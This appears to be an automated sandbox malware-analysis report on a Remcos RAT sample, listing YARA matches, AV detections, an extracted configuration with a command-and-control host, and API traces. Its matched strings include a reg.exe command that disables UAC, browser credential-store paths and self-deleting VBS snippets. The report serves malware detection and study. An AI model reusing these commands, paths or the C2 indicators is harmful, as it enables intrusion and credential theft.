14.2.logagent.exe.10590000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x6025f:$str_a1: C:\Windows\System32\cmd.exe 0x601db:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x601db:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f7e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5fe3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f437:$str_b2: Executing file: 0x603a3:$str_b3: GetDirectListeningPort 0x5fbfb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fe23:$str_b7: \update.vbs 0x5f487:$str_b9: Downloaded file: 0x5f473:$str_b10: Downloading file: 0x5f45b:$str_b12: Failed to upload file: 0x6036b:$str_b13: StartForward 0x6038b:$str_b14: StopForward 0x5fdcb:$str_b15: fso.DeleteFile " 0x5fd5f:$str_b16: On Error Resume Next 0x5fdfb:$str_b17: fso.DeleteFolder " 0x5f44b:$str_b18: Uploaded file: 0x5f4c7:$str_b19: Unable to delete: 0x5fd93:$str_b20: while fso.FileExists(" 0x5f91c:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.105919bb.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.105919bb.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.105919bb.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.105919bb.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
28.2.mobsync.exe.105919bb.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.105919bb.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.105919bb.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.logagent.exe.105919bb.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.logagent.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
28.2.mobsync.exe.105919bb.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.105919bb.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.10590000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.logagent.exe.10590000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
Click to see the 31 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 32.2.logagent.exe.105919bb.1.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Multi AV Scanner detection for submitted file

Show sources

Source: ZfigYV6HXd.exe	Virustotal: Detection: 31%			Perma Link
Source: ZfigYV6HXd.exe	ReversingLabs: Detection: 26%

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe

ReversingLabs: Detection: 26%

Machine Learning detection for sample

Show sources

Source: ZfigYV6HXd.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe

Joe Sandbox ML: detected

Source: 32.2.logagent.exe.10590000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.0.logagent.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.mobsync.exe.10590000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 32.0.logagent.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.logagent.exe.10590000.1.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		14_2_0042E5CA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		28_2_0076E5CA

Source: logagent.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: ZfigYV6HXd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	14_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004061C3 FindFirstFileW,FindNextFileW,	14_2_004061C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	14_2_0040A22D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	14_2_004153F5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	14_2_00417754
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	14_2_004077EC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00446AF9 FindFirstFileExA,	14_2_00446AF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0074A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	28_2_0074A012
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007461C3 FindFirstFileW,FindNextFileW,	28_2_007461C3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0074A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	28_2_0074A22D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007553F5 FindFirstFileW,FindNextFileW,FindNextFileW,	28_2_007553F5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00757754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	28_2_00757754
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007477EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	28_2_007477EC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00786AF9 FindFirstFileExA,	28_2_00786AF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00747C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	28_2_00747C55

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

14_2_0040697D

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: trapboijiggy.dvrlists.com

Source: global traffic

TCP traffic: 192.168.2.5:49745 -> 31.3.152.100:54614

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_00422251 recv,

14_2_00422251

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00749BD9 OpenClipboard,GetClipboardData,CloseClipboard,

28_2_00749BD9

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_004089BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

14_2_004089BA

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00749BD9 OpenClipboard,GetClipboardData,CloseClipboard,

28_2_00749BD9

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Contains functionalty to change the wallpaper

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00757F10 SystemParametersInfoW,

28_2_00757F10

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
